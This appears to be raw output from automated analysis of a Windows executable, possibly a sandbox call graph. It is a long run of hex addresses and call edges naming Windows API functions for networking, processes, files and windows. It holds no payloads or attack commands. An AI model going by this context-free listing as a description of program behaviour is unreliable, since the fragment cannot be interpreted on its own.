102598->102747 102600 1c1090 102600->102299 102602 1784a6 81 API calls 102601->102602 102603 1c6fd6 SetWindowTextW 102602->102603 102603->102299 102605 1784a6 81 API calls 102604->102605 102606 1bdcfc 102605->102606 102935 1b6d6d 102606->102935 102608 1bdd06 102608->102299 102610 17cdb4 48 API calls 102609->102610 102611 1c9515 102610->102611 102612 1bbe47 50 API calls 102611->102612 102613 1c9522 102612->102613 102614 1c952f send 102613->102614 102615 1c9546 102614->102615 102616 1c956a 102615->102616 102617 1c9552 WSAGetLastError 102615->102617 102616->102299 102617->102616 102619 17cdb4 48 API calls 102618->102619 102620 18f572 102619->102620 102621 18f57a timeGetTime 102620->102621 102622 1e75d1 Sleep 102620->102622 102623 17cdb4 48 API calls 102621->102623 102624 18f590 102623->102624 102947 17e1f0 102624->102947 102628 1784a6 81 API calls 102627->102628 102629 1beff2 102628->102629 103199 1b78ad GetFullPathNameW 102629->103199 102634 1bf04b CoInitialize CoCreateInstance 102636 1bf08e 102634->102636 102637 1bf070 102634->102637 102661->102300 102662->102299 102663->102496 102664->102492 102665->102500 102666->102500 102668 17c4cd 48 API calls 102667->102668 102669 1d3d89 102668->102669 102670 17c4cd 48 API calls 102669->102670 102671 1d3d91 102670->102671 102748 1c2306 102747->102748 102749 1c230a 102748->102749 102750 1c2365 102748->102750 102751 19010a 48 API calls 102749->102751 102816 18f0f3 48 API calls 102750->102816 102753 1c2311 102751->102753 102754 1c231f 102753->102754 102803 175080 49 API calls 102753->102803 102756 1784a6 81 API calls 102754->102756 102757 1c2331 102756->102757 102804 174bf9 102757->102804 102758 1c234d 102758->102600 102760 1c243f 102764 1bbe47 50 API calls 102760->102764 102761 1c2379 102761->102758 102761->102760 102763 1c23bb 102761->102763 102766 1784a6 81 API calls 102763->102766 102767 1c2446 102764->102767 102774 1c23c2 102766->102774 102823 1b689f SetFilePointerEx SetFilePointerEx WriteFile 102767->102823 102769 1c23f6 102785 1b67dc 102769->102785 102771 1c2400 102817 177b6e 102771->102817 102774->102769 102774->102771 102779 1c23fe Mailbox 102779->102758 102781 1750ec CloseHandle 102779->102781 102783 1c2490 102781->102783 102786 1b67ec 102785->102786 102787 1b67f6 102785->102787 102841 1b6917 SetFilePointerEx SetFilePointerEx WriteFile 102786->102841 102789 1b6808 102787->102789 102790 1b67fc 102787->102790 102792 1b6811 102789->102792 102793 1b6824 102789->102793 102842 1b68b9 51 API calls 102790->102842 102802 1b67f4 Mailbox 102802->102779 102803->102754 102805 1750ec CloseHandle 102804->102805 102806 174c04 102805->102806 102881 174b88 102806->102881 102816->102761 102818 19010a 48 API calls 102817->102818 102819 177b93 102818->102819 102820 17a6f8 48 API calls 102819->102820 102823->102779 102841->102802 102842->102802 102882 174ba1 CreateFileW 102881->102882 102883 1e4957 102881->102883 102936 1b6d8a __wsetenvp 102935->102936 102937 1b6db3 GetFileAttributesW 102936->102937 102938 1b6dc5 GetLastError 102937->102938 102946 1b6de3 102937->102946 102939 1b6dd0 CreateDirectoryW 102938->102939 102940 1b6de7 102938->102940 102939->102940 102939->102946 102941 173bcf 48 API calls 102940->102941 102940->102946 102942 1b6df7 _wcsrchr 102941->102942 102943 1b6d6d 48 API calls 102942->102943 102942->102946 102944 1b6e1b 102943->102944 102945 1b6e28 CreateDirectoryW 102944->102945 102944->102946 102945->102946 102946->102608 102948 17e216 102947->102948 103008 17e226 Mailbox 102947->103008 102949 17e670 102948->102949 102948->103008 103077 18ecee 417 API calls 102949->103077 102950 1bd520 86 API calls 102950->103008 102952 17e4fd 102952->102299 102954 17e681 102954->102952 102955 17e68e 102954->102955 103079 18ec33 417 API calls Mailbox 102955->103079 102956 17e26c PeekMessageW 102956->103008 102958 17e695 LockWindowUpdate DestroyWindow GetMessageW 102958->102952 102959 1e5b13 Sleep 102959->103008 102962 17e4e7 102962->102952 103078 17322e 16 API calls 102962->103078 102966 17e657 PeekMessageW 102966->103008 102967 17e517 timeGetTime 102967->103008 102969 17c935 48 API calls 102969->103008 102970 17e641 TranslateMessage DispatchMessageW 102970->102966 102971 1e5dfc WaitForSingleObject 102973 1e5e19 GetExitCodeProcess CloseHandle 102971->102973 102971->103008 102972 19010a 48 API calls 102972->103008 102973->103008 102974 17d3d2 48 API calls 103001 1e5cce Mailbox 102974->103001 102975 1e6147 Sleep 102975->103001 102976 17e6cc timeGetTime 103080 18cf79 49 API calls 102976->103080 102977 1e5feb Sleep 102977->103008 102982 1e61de GetExitCodeProcess 102986 1e620a CloseHandle 102982->102986 102987 1e61f4 WaitForSingleObject 102982->102987 102984 171000 393 API calls 102984->103008 102986->103001 102987->102986 102987->103008 102988 1e5cea Sleep 102988->103008 102989 1e5cd7 Sleep 102989->102988 102990 1d8a48 108 API calls 102990->103001 102991 171dce 107 API calls 102991->103008 102993 1e6266 Sleep 102993->103008 102994 18cf79 49 API calls 102994->103008 102995 17caee 48 API calls 102995->103001 103000 17fa40 393 API calls 103000->103008 103001->102974 103001->102982 103001->102988 103001->102989 103001->102990 103001->102993 103001->102995 103001->103008 103082 1b56dc 49 API calls Mailbox 103001->103082 103083 18cf79 49 API calls 103001->103083 103084 17d380 103001->103084 103088 171000 417 API calls 103001->103088 103090 1cd12a 50 API calls 103001->103090 103091 1b8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103001->103091 103092 18e3a5 timeGetTime 103001->103092 103093 1b6f5b CreateToolhelp32Snapshot Process32FirstW 103001->103093 103003 1844e0 393 API calls 103003->103008 103004 183680 393 API calls 103004->103008 103006 17caee 48 API calls 103006->103008 103007 17d380 55 API calls 103007->103008 103008->102950 103008->102956 103008->102959 103008->102962 103008->102966 103008->102967 103008->102969 103008->102970 103008->102971 103008->102972 103008->102975 103008->102976 103008->102977 103008->102984 103008->102988 103008->102991 103008->102994 103008->103000 103008->103001 103008->103003 103008->103004 103008->103006 103008->103007 103009 17e7e0 103008->103009 103016 17ea00 103008->103016 103066 18f381 103008->103066 103071 18ed1a 103008->103071 103076 17e7b0 417 API calls Mailbox 103008->103076 103081 1d8b20 48 API calls 103008->103081 103089 18e3a5 timeGetTime 103008->103089 103010 17e80f 103009->103010 103011 17e7fd 103009->103011 103131 1bd520 86 API calls 4 library calls 103010->103131 103100 17dcd0 103011->103100 103015 1e98e8 103015->103015 103017 17ea20 103016->103017 103018 17fa40 417 API calls 103017->103018 103020 17ea89 103017->103020 103021 1e9919 103018->103021 103019 1e99bc 103025 17d3d2 48 API calls 103020->103025 103047 17eb18 103020->103047 103053 17ecd7 Mailbox 103020->103053 103021->103020 103143 1bd520 86 API calls 4 library calls 103021->103143 103023 17d3d2 48 API calls 103027 1e9963 103025->103027 103028 1bd520 86 API calls 103028->103053 103030 1e9d70 103032 17d380 55 API calls 103032->103053 103034 1e9ddf 103036 17fa40 417 API calls 103036->103053 103037 1e9e49 103038 1e9dc2 103043 17342c 48 API calls 103043->103053 103046 1814a0 48 API calls 103046->103053 103047->103023 103047->103053 103051 17f56f 103065 17ef0c Mailbox 103051->103065 103156 1bd520 86 API calls 4 library calls 103051->103156 103052 1e9a3c 103149 1cd154 48 API calls 103052->103149 103053->103019 103053->103028 103053->103030 103053->103032 103053->103034 103053->103036 103053->103037 103053->103038 103053->103043 103053->103046 103053->103051 103053->103052 103053->103065 103139 17d805 103053->103139 103147 1ba3ee 48 API calls 103053->103147 103148 1cede9 417 API calls 103053->103148 103153 1aa599 InterlockedDecrement 103053->103153 103154 1cf4df 417 API calls 103053->103154 103065->103008 103067 18f390 103066->103067 103068 1eee11 103066->103068 103067->103008 103069 1eee46 103068->103069 103070 1eee28 TranslateAcceleratorW 103068->103070 103070->103067 103072 18ed2c 103071->103072 103075 18ed34 103071->103075 103072->103008 103073 18ed5e IsDialogMessageW 103073->103072 103073->103075 103074 1eebec GetClassLongW 103074->103073 103074->103075 103075->103072 103075->103073 103075->103074 103076->103008 103077->102962 103078->102954 103079->102958 103080->103008 103081->103008 103082->103001 103083->103001 103085 17d38b 103084->103085 103086 17d3b4 103085->103086 103161 17d772 55 API calls 103085->103161 103086->103001 103088->103001 103089->103008 103090->103001 103091->103001 103092->103001 103162 1b79c2 103093->103162 103101 17fa40 417 API calls 103100->103101 103116 17dd0f _memmove 103101->103116 103102 1e8dbe 103105 17dd70 103106 17e12b Mailbox 103108 19010a 48 API calls 103108->103116 103113 17df29 103116->103102 103116->103105 103116->103106 103116->103108 103116->103113 103117 17deb7 103116->103117 103117->103106 103131->103015 103140 17d828 _memmove 103139->103140 103142 17d815 103139->103142 103140->103053 103142->103140 103143->103020 103147->103053 103148->103053 103153->103053 103154->103053 103156->103065 103161->103086 103163 1b79e9 103162->103163 103166 1b79d0 103162->103166 103172 19224a 58 API calls __wcstoi64 103163->103172 103166->103163 103167 1b79ef 103166->103167 103171 1922df GetStringTypeW __wtof_l 103166->103171 103171->103166 103172->103167 103200 177e53 48 API calls 103199->103200 103201 1b78df 103200->103201 103202 18e617 48 API calls 103201->103202 103203 1b78eb 103202->103203 103204 1c267a 103203->103204 103205 1c26a4 __wsetenvp 103204->103205 103206 1bf039 103205->103206 103207 1c26d8 103205->103207 103210 1c2763 103205->103210 103206->102634 103211 1739e8 48 API calls 2 library calls 103206->103211 103207->103206 103213 18dfd2 60 API calls 103207->103213 103210->103206 103214 18dfd2 60 API calls 103210->103214 103211->102634 103213->103207 103214->103210 103215->102321 103216->102321 103217->101721 103218->101721 103219->101721 103220->101721 103221->101721 103222->101719 103223->101708 103224->101694 103225->101691 103226->101699 103227->101710 103229 1b7700 103228->103229 103237 1b76f9 _wcsncpy 103228->103237 103230 19010a 48 API calls 103229->103230 103231 1b7706 GetFileVersionInfoW 103230->103231 103232 1b7722 __wsetenvp 103231->103232 103233 19010a 48 API calls 103232->103233 103235 1b7739 _wcscat _wcscmp _wcscpy _wcsstr 103233->103235 103234 191bc7 _W_store_winword 59 API calls 103236 1b77f7 103234->103236 103239 1b7779 751C1560 103235->103239 103240 1b7793 _wcscat 103235->103240 103236->103237 103238 1b7827 751C1560 103236->103238 103237->101751 103238->103237 103241 1b783d _wcscmp 103238->103241 103239->103240 103240->103234 103241->103237 103243 19234b 80 API calls 3 library calls 103241->103243 103243->103237 103245 1784a6 81 API calls 103244->103245 103246 1cf7db 103245->103246 103251 1cf81d Mailbox 103246->103251 103280 1d0458 103246->103280 103248 1cfa7c 103249 1cfbeb 103248->103249 103256 1cfa86 103248->103256 103326 1d0579 89 API calls Mailbox 103249->103326 103251->101759 103253 1cfbf8 103255 1cfc04 103253->103255 103253->103256 103254 1cf875 Mailbox 103254->103248 103254->103251 103257 1784a6 81 API calls 103254->103257 103311 1d28d9 48 API calls _memmove 103254->103311 103312 1cfc96 60 API calls 2 library calls 103254->103312 103255->103251 103293 1cf5fb 103256->103293 103257->103254 103262 1cfaba 103307 18f92c 103262->103307 103265 1cfaee 103314 173320 103265->103314 103266 1cfad4 103313 1bd520 86 API calls 4 library calls 103266->103313 103269 1cfadf GetCurrentProcess TerminateProcess 103269->103265 103270 1cfb05 103272 1814a0 48 API calls 103270->103272 103281 17b8a7 48 API calls 103280->103281 103282 1d0473 CharLowerBuffW 103281->103282 103283 1c267a 60 API calls 103282->103283 103284 1d0494 103283->103284 103286 17d3d2 48 API calls 103284->103286 103291 1d04cf Mailbox 103284->103291 103287 1d04ac 103286->103287 103288 177f40 48 API calls 103287->103288 103289 1d04c3 103288->103289 103290 17a2fb 48 API calls 103289->103290 103290->103291 103292 1d050b Mailbox 103291->103292 103328 1cfc96 60 API calls 2 library calls 103291->103328 103292->103254 103294 1cf66b 103293->103294 103295 1cf616 103293->103295 103299 1d0719 103294->103299 103296 19010a 48 API calls 103295->103296 103297 1cf638 103296->103297 103297->103294 103298 19010a 48 API calls 103297->103298 103298->103297 103300 1d0944 Mailbox 103299->103300 103306 1d073c _strcat _wcscpy __wsetenvp 103299->103306 103300->103262 103301 17d00b 58 API calls 103301->103306 103302 17cdb4 48 API calls 103302->103306 103303 1784a6 81 API calls 103303->103306 103304 1945ec 47 API calls __crtLCMapStringA_stat 103304->103306 103306->103300 103306->103301 103306->103302 103306->103303 103306->103304 103329 1b8932 50 API calls __wsetenvp 103306->103329 103309 18f941 103307->103309 103308 18f9d9 select 103310 18f9a7 103308->103310 103309->103308 103309->103310 103310->103265 103310->103266 103311->103254 103312->103254 103313->103269 103315 173334 103314->103315 103317 173339 Mailbox 103314->103317 103316 17342c 48 API calls 103315->103316 103316->103317 103323 173347 103317->103323 103330 17346e 48 API calls 103317->103330 103319 19010a 48 API calls 103320 1733d8 103319->103320 103322 19010a 48 API calls 103320->103322 103321 173422 103321->103270 103323->103319 103323->103321 103326->103253 103328->103292 103329->103306 103330->103323 103332 1bae1d 103331->103332 103345 1baf1f 103331->103345 103333 1baf05 Mailbox 103332->103333 103335 1baebc 103332->103335 103338 1bae2e 103332->103338 103334 19010a 48 API calls 103333->103334 103350 1bae7d Mailbox _memmove 103334->103350 103336 19010a 48 API calls 103335->103336 103336->103350 103337 1bae4b 103339 1bae86 103337->103339 103340 1bae76 103337->103340 103337->103350 103338->103337 103342 19010a 48 API calls 103338->103342 103344 19010a 48 API calls 103339->103344 103343 19010a 48 API calls 103340->103343 103341 19010a 48 API calls 103341->103345 103342->103337 103343->103350 103346 1bae8c 103344->103346 103345->101762 103351 1ba65e 48 API calls 103346->103351 103348 1bae98 103349 18f26b 50 API calls 103348->103349 103349->103350 103350->103341 103351->103348 103360 1cae3b 103352->103360 103355 1cad31 htons 103357 1cad1b 103355->103357 103356 1cad05 Mailbox 103356->103355 103356->103357 103357->101770 103359 1bd7f2 103358->103359 103359->101777 103361 17a6d4 48 API calls 103360->103361 103362 1cae49 103361->103362 103365 1cae79 WideCharToMultiByte 103362->103365 103364 1cacf3 inet_addr 103364->103356 103366 1cae9d 103365->103366 103367 1caea7 103365->103367 103368 18f324 48 API calls 103366->103368 103369 19010a 48 API calls 103367->103369 103372 1caea5 103368->103372 103370 1caeae WideCharToMultiByte 103369->103370 103371 18f2d0 48 API calls 103370->103371 103371->103372 103372->103364 103373->101791 103374->101793 103376 177c3a 103375->103376 103378 177bfb 103375->103378 103377 17c935 48 API calls 103376->103377 103380 177c0e 103377->103380 103379 19010a 48 API calls 103378->103379 103379->103380 103380->101795 103382 17d89e 50 API calls 103381->103382 103383 171a08 103382->103383 103384 1edb7d 103383->103384 103385 171a12 103383->103385 103386 177e53 48 API calls 103384->103386 103387 1784a6 81 API calls 103385->103387 103388 1edb8d 103386->103388 103389 171a1f 103387->103389 103388->103388 103390 17c935 48 API calls 103389->103390 103391 171a2d 103390->103391 103392 171dce 103391->103392 103393 171de4 Mailbox 103392->103393 103394 1edb26 103393->103394 103396 171dfd 103393->103396 103395 1edb2b IsWindow 103394->103395 103397 1edb3f 103395->103397 103404 171e51 103395->103404 103398 171e46 103396->103398 103399 1784a6 81 API calls 103396->103399 103460 17200a 103397->103460 103401 1edb65 IsWindow 103398->103401 103398->103404 103402 171e17 103399->103402 103401->103397 103401->103404 103407 171f04 103402->103407 103404->101803 103408 171f1a Mailbox 103407->103408 103409 17c935 48 API calls 103408->103409 103410 171f3e 103409->103410 103411 17c935 48 API calls 103410->103411 103412 171f49 103411->103412 103413 177e53 48 API calls 103412->103413 103414 171f59 103413->103414 103415 17d3d2 48 API calls 103414->103415 103416 171f87 103415->103416 103417 17d3d2 48 API calls 103416->103417 103418 171f90 103417->103418 103419 17d3d2 48 API calls 103418->103419 103420 171f99 103419->103420 103461 172016 103460->103461 103462 19010a 48 API calls 103461->103462 103463 172023 103462->103463 103464 17197e 103463->103464 103465 171990 103464->103465 103469 1719af _memmove 103464->103469 103467 19010a 48 API calls 103465->103467 103466 19010a 48 API calls 103468 1719c6 103466->103468 103467->103469 103468->103404 103469->103466 103505->101842 103506->101881 103507->101883 103508->101885 103509->101944 103510->101944 103512 19010a 48 API calls 103511->103512 103513 17818f 103512->103513 103513->101944 103514->101944 103515->101932 103516->101932 103517->101932 103518->101944 103519->101951 103520->101953 103521->101917 103522->101913 103523->101930 103524->101937 103526 1e4a7d FindFirstFileW 103525->103526 103527 18dd89 103525->103527 103528 1e4a8e 103526->103528 103529 1e4a95 FindClose 103526->103529 103527->101593 103528->103529 103531 1c6b25 GetWindowRect 103530->103531 103532 1c6b42 103530->103532 103533 1c6b5c 103531->103533 103532->103533 103534 1c6b52 ClientToScreen 103532->103534 103533->101967 103533->101970 103534->103533 103535->101973 103536->101977 103538 17c4cd 48 API calls 103537->103538 103539 1ae2fe 103538->103539 103554 17193b SendMessageTimeoutW 103539->103554 103541 1ae305 103547 1ae309 Mailbox 103541->103547 103555 1ae390 103541->103555 103543 1ae314 103544 19010a 48 API calls 103543->103544 103545 1ae338 SendMessageW 103544->103545 103546 1ae34e _strlen 103545->103546 103545->103547 103548 1ae35a 103546->103548 103549 1ae378 103546->103549 103547->101989 103560 1ae0f5 48 API calls 2 library calls 103548->103560 103551 177e53 48 API calls 103549->103551 103551->103547 103552 1ae362 103561 17c610 MultiByteToWideChar 103552->103561 103554->103541 103580 17193b SendMessageTimeoutW 103555->103580 103557 1ae39a 103558 1ae39e 103557->103558 103559 1ae3a2 SendMessageW 103557->103559 103558->103543 103559->103543 103560->103552 103562 1e24df 103561->103562 103563 17c638 103561->103563 103564 17c4cd 48 API calls 103562->103564 103565 19010a 48 API calls 103563->103565 103566 1e24e7 103564->103566 103567 17c64f MultiByteToWideChar 103565->103567 103573 17a6f8 48 API calls 103566->103573 103568 17c6b7 103567->103568 103569 17c66c 103567->103569 103569->103568 103580->103557 103581->102005 103582->102021 103583->102021 103584->102032 103585->102028 103586->102021 103587->102022 103589 18f069 103588->103589 103590 18f057 103588->103590 103593 17c4cd 48 API calls 103589->103593 103591 18f05d 103590->103591 103592 18f063 103590->103592 103594 17a6d4 48 API calls 103591->103594 103595 17a6d4 48 API calls 103592->103595 103603 1b64f5 103593->103603 103598 18f081 103594->103598 103596 1b668b 103595->103596 103599 174c4f 50 API calls 103596->103599 103597 1b6524 103597->102067 103617 174c4f 103598->103617 103602 1b6699 103599->103602 103610 1b66a9 Mailbox 103602->103610 103625 1b6765 50 API calls 103602->103625 103603->103597 103623 1b649b ReadFile SetFilePointerEx 103603->103623 103624 17bd2f 48 API calls _memmove 103603->103624 103605 1e49b2 103608 17c610 50 API calls 103609 18f0a3 Mailbox 103608->103609 103609->102067 103610->102067 103611->102044 103612->102072 103613->102041 103614->102047 103615->102063 103616->102070 103618 18f324 48 API calls 103617->103618 103621 174c60 103618->103621 103619 174c95 103619->103605 103619->103608 103620 174ca0 2 API calls 103620->103621 103621->103619 103621->103620 103626 174d29 103621->103626 103623->103603 103624->103603 103625->103610 103627 1e45cf 103626->103627 103628 174d3d 103626->103628 103630 17a6f8 48 API calls 103627->103630 103635 174d67 103628->103635 103632 1e45da 103630->103632 103631 174d49 103631->103621 103633 19010a 48 API calls 103632->103633 103634 1e45ef _memmove 103633->103634 103636 174d7d 103635->103636 103639 174d78 _memmove 103635->103639 103637 1e4703 103636->103637 103638 19010a 48 API calls 103636->103638 103638->103639 103639->103631 103640->102080 103642 1d23eb _memset 103641->103642 103643 1d2428 103642->103643 103644 1d2452 103642->103644 103645 17cdb4 48 API calls 103643->103645 103647 17cdb4 48 API calls 103644->103647 103649 1d2476 103644->103649 103648 1d2433 103645->103648 103646 1d24b0 103653 1784a6 81 API calls 103646->103653 103650 1d2448 103647->103650 103648->103649 103651 17cdb4 48 API calls 103648->103651 103649->103646 103652 17cdb4 48 API calls 103649->103652 103655 17cdb4 48 API calls 103650->103655 103651->103650 103652->103646 103654 1d24d4 103653->103654 103656 173bcf 48 API calls 103654->103656 103655->103649 103657 1d24de 103656->103657 103658 1d24e8 103657->103658 103659 1d25a1 103657->103659 103661 1784a6 81 API calls 103658->103661 103660 1d25d3 GetCurrentDirectoryW 103659->103660 103662 1784a6 81 API calls 103659->103662 103663 19010a 48 API calls 103660->103663 103664 1d24f9 103661->103664 103665 1d25b8 103662->103665 103666 1d25f8 GetCurrentDirectoryW 103663->103666 103667 173bcf 48 API calls 103664->103667 103668 173bcf 48 API calls 103665->103668 103669 1d2605 103666->103669 103670 1d2503 103667->103670 103672 1d25c2 __wsetenvp 103668->103672 103674 17ca8e 48 API calls 103669->103674 103681 1d263e 103669->103681 103671 1784a6 81 API calls 103670->103671 103673 1d2514 103671->103673 103672->103660 103672->103681 103675 173bcf 48 API calls 103673->103675 103676 1d261e 103674->103676 103677 1d251e 103675->103677 103678 17ca8e 48 API calls 103676->103678 103679 1784a6 81 API calls 103677->103679 103682 1d262e 103678->103682 103683 1d252f 103679->103683 103680 1d268a 103685 1d274c CreateProcessW 103680->103685 103686 1d26c1 103680->103686 103681->103680 103719 1ba17a 8 API calls 103681->103719 103687 17ca8e 48 API calls 103682->103687 103688 173bcf 48 API calls 103683->103688 103700 1d276b 103685->103700 103722 1abc90 69 API calls 103686->103722 103687->103681 103691 1d2539 103688->103691 103689 1d2655 103720 1ba073 8 API calls 103689->103720 103693 1d256f GetSystemDirectoryW 103691->103693 103696 1784a6 81 API calls 103691->103696 103695 19010a 48 API calls 103693->103695 103694 1d2670 103721 1ba102 8 API calls 103694->103721 103698 1d2594 GetSystemDirectoryW 103695->103698 103699 1d2550 103696->103699 103698->103669 103701 173bcf 48 API calls 103699->103701 103703 1d27bd CloseHandle 103700->103703 103704 1d2780 103700->103704 103702 1d255a __wsetenvp 103701->103702 103702->103669 103702->103693 103705 1d27cb 103703->103705 103711 1d27f5 103703->103711 103706 1d2791 GetLastError 103704->103706 103723 1b9d09 CloseHandle Mailbox 103705->103723 103710 1d27a5 103706->103710 103708 1d27fb 103708->103710 103724 1b9b29 CloseHandle 103710->103724 103711->103708 103714 1d2827 CloseHandle 103711->103714 103714->103710 103715 1d1f2b 103715->101593 103718 1d26df __wsetenvp 103718->103700 103719->103689 103720->103694 103721->103680 103722->103718 103724->103715 103725->102098 103726->102110 103727->102120 103728->102121 103730 17a9af 103729->103730 103733 17a9ca 103729->103733 103731 17b8a7 48 API calls 103730->103731 103732 17a9b7 CharUpperBuffW 103731->103732 103732->103733 103733->102139 103735 1e4c5a 103734->103735 103736 1710f9 103734->103736 103737 19010a 48 API calls 103736->103737 103738 171100 103737->103738 103739 171121 103738->103739 103768 17113c 48 API calls 103738->103768 103739->102160 103741->102148 103742->102199 103743->102199 103744->102199 103745->102206 103746->102148 103748 17d30a 103747->103748 103749 17d2df 103747->103749 103748->102162 103748->102163 103752 17d2e6 103749->103752 103770 17d349 53 API calls 103749->103770 103752->103748 103769 17d349 53 API calls 103752->103769 103753->102197 103754->102189 103755->102189 103756->102147 103757->102197 103758->102175 103759->102197 103760->102197 103761->102197 103762->102199 103763->102199 103764->102199 103765->102197 103766->102193 103767->102197 103768->103739 103769->103748 103770->103752 103771->102213 103772 1e4ddc 103773 1e4de6 VariantClear 103772->103773 103774 184472 103772->103774 103773->103774 103775 1ec05b 103776 1ec05d 103775->103776 103779 1b78ee WSAStartup 103776->103779 103778 1ec066 103780 1b7917 gethostname gethostbyname 103779->103780 103781 1b79b1 _wcscpy 103779->103781 103780->103781 103782 1b793a _memmove 103780->103782 103781->103778 103783 1b7970 inet_ntoa 103782->103783 103787 1b7952 _wcscpy 103782->103787 103785 1b7989 _strcat 103783->103785 103784 1b79a9 WSACleanup 103784->103781 103788 1b8553 103785->103788 103787->103784 103789 1b8561 103788->103789 103790 1b8565 _strlen 103788->103790 103789->103787 103791 1b8574 MultiByteToWideChar 103790->103791 103791->103789 103792 1b858a 103791->103792 103793 19010a 48 API calls 103792->103793 103794 1b85a6 MultiByteToWideChar 103793->103794 103794->103789 103795 1e1edb 103800 17131c 103795->103800 103801 17133e 103800->103801 103834 171624 103801->103834 103806 17d3d2 48 API calls 103807 17137e 103806->103807 103808 17d3d2 48 API calls 103807->103808 103809 171388 103808->103809 103810 17d3d2 48 API calls 103809->103810 103811 171392 103810->103811 103812 17d3d2 48 API calls 103811->103812 103813 1713d8 103812->103813 103814 17d3d2 48 API calls 103813->103814 103815 1714bb 103814->103815 103842 171673 103815->103842 103880 1717e0 103834->103880 103837 177e53 48 API calls 103838 171344 103837->103838 103839 1716db 103838->103839 103894 171867 6 API calls 103839->103894 103841 171374 103841->103806 103843 17d3d2 48 API calls 103842->103843 103844 171683 103843->103844 103845 17d3d2 48 API calls 103844->103845 103846 17168b 103845->103846 103895 177d70 103846->103895 103849 177d70 48 API calls 103887 1717fc 103880->103887 103883 1717fc 48 API calls 103884 1717f0 103883->103884 103885 17d3d2 48 API calls 103884->103885 103886 17165b 103885->103886 103886->103837 103888 17d3d2 48 API calls 103887->103888 103889 171807 103888->103889 103890 17d3d2 48 API calls 103889->103890 103891 17180f 103890->103891 103892 17d3d2 48 API calls 103891->103892 103893 1717e8 103892->103893 103893->103883 103894->103841 103896 17d3d2 48 API calls 103895->103896 103897 177d79 103896->103897 103898 17d3d2 48 API calls 103897->103898 103899 171693 103898->103899 103899->103849 103902 17e85b 103905 17d937 103902->103905 103904 17e865 103906 17d94f 103905->103906 103907 17d9a7 103905->103907 103906->103907 103909 17fa40 417 API calls 103906->103909 103911 17d9d0 103907->103911 103914 1bd520 86 API calls 4 library calls 103907->103914 103912 17d986 103909->103912 103910 1e979b 103910->103904 103911->103904 103912->103911 103913 17d89e 50 API calls 103912->103913 103913->103907 103914->103910 103915 180ff7 103916 18e016 50 API calls 103915->103916 103917 18100d 103916->103917 103974 18e08f 103917->103974 103919 18103d 103922 17fbf1 Mailbox 103919->103922 103993 1bd520 86 API calls 4 library calls 103919->103993 103923 181063 103994 1bd520 86 API calls 4 library calls 103923->103994 103925 18105e 103930 17c935 48 API calls 103925->103930 103926 17c935 48 API calls 103948 17fad8 Mailbox _memmove 103926->103948 103928 180dee 103931 17d89e 50 API calls 103928->103931 103929 180119 103995 1bd520 86 API calls 4 library calls 103929->103995 103930->103922 103938 180dfa 103931->103938 103932 17f6d0 417 API calls 103932->103948 103933 17d89e 50 API calls 103936 180e83 103933->103936 103934 1eb772 103996 1bd520 86 API calls 4 library calls 103934->103996 103935 17d3d2 48 API calls 103935->103948 103941 17caee 48 API calls 103936->103941 103938->103933 103939 1eb7d2 103940 191b2a 52 API calls __cinit 103940->103948 103949 1810f1 Mailbox 103941->103949 103945 19010a 48 API calls 103945->103948 103946 17fa40 417 API calls 103946->103948 103948->103919 103948->103922 103948->103923 103948->103925 103948->103926 103948->103928 103948->103929 103948->103932 103948->103934 103948->103935 103948->103936 103948->103938 103948->103940 103948->103945 103948->103946 103948->103949 103951 1aa599 InterlockedDecrement 103948->103951 103952 1eb583 103948->103952 103954 1c013f 87 API calls 103948->103954 103955 1d1f19 132 API calls 103948->103955 103956 18f03e 2 API calls 103948->103956 103957 1d0bfa 129 API calls 103948->103957 103958 1d30ad 93 API calls 103948->103958 103959 1d798d 109 API calls 103948->103959 103960 1781c6 85 API calls 103948->103960 103961 1c936f 55 API calls 103948->103961 103962 1d804e 113 API calls 103948->103962 103963 1750a3 49 API calls 103948->103963 103964 18ef0d 94 API calls 103948->103964 103965 1cb74b 417 API calls 103948->103965 103966 1d17aa 87 API calls 103948->103966 103967 1d10e5 82 API calls 103948->103967 103968 18f461 98 API calls 103948->103968 103969 1c8065 55 API calls 103948->103969 103970 1bbe47 50 API calls 103948->103970 103971 18dd84 3 API calls 103948->103971 103972 1c92c0 88 API calls 103948->103972 103973 1c9122 91 API calls 103948->103973 103986 181620 59 API calls Mailbox 103948->103986 103987 1cee52 82 API calls 2 library calls 103948->103987 103988 1cef9d 90 API calls Mailbox 103948->103988 103989 1bb020 48 API calls 103948->103989 103990 1ce713 417 API calls Mailbox 103948->103990 103992 1bd520 86 API calls 4 library calls 103949->103992 103951->103948 103991 1bd520 86 API calls 4 library calls 103952->103991 103954->103948 103955->103948 103956->103948 103957->103948 103958->103948 103959->103948 103960->103948 103961->103948 103962->103948 103963->103948 103964->103948 103965->103948 103966->103948 103967->103948 103968->103948 103969->103948 103970->103948 103971->103948 103972->103948 103973->103948 103975 177b6e 48 API calls 103974->103975 103976 18e0b4 _wcscmp 103975->103976 103977 17caee 48 API calls 103976->103977 103979 18e0e2 Mailbox 103976->103979 103978 1eb9c7 103977->103978 103997 177b4b 48 API calls Mailbox 103978->103997 103979->103948 103981 1eb9d5 103982 17d2d2 53 API calls 103981->103982 103983 1eb9e7 103982->103983 103984 17d89e 50 API calls 103983->103984 103985 1eb9ec Mailbox 103983->103985 103984->103985 103985->103948 103986->103948 103987->103948 103988->103948 103989->103948 103990->103948 103991->103949 103992->103922 103993->103923 103994->103929 103995->103934 103996->103939 103997->103981 103998 183588 104018 18308b 103998->104018 103999 1835b0 104024 17203a 417 API calls 103999->104024 104002 1e848d 104029 1bd520 86 API calls 4 library calls 104002->104029 104003 1e84b0 104013 1832b9 104003->104013 104031 1bd520 86 API calls 4 library calls 104003->104031 104004 1831dc 104004->104003 104008 18366d 104004->104008 104004->104013 104015 1e833f VariantClear 104004->104015 104005 1cd154 48 API calls 104005->104018 104008->104013 104032 1bd520 86 API calls 4 library calls 104008->104032 104009 183665 104027 1bd520 86 API calls 4 library calls 104009->104027 104010 173320 48 API calls 104010->104018 104015->104004 104016 1e8478 104028 1bd520 86 API calls 4 library calls 104016->104028 104018->103999 104018->104002 104018->104004 104018->104005 104018->104009 104018->104010 104018->104016 104019 17fa40 417 API calls 104018->104019 104020 1e84a4 104018->104020 104022 1835f0 104018->104022 104025 1aa599 InterlockedDecrement 104018->104025 104026 17346e 48 API calls 104018->104026 104019->104018 104030 1bd520 86 API calls 4 library calls 104020->104030 104023 17c935 48 API calls 104022->104023 104023->104004 104024->104004 104025->104018 104026->104018 104027->104013 104028->104013 104029->104013 104030->104003 104031->104013 104032->104013 104033 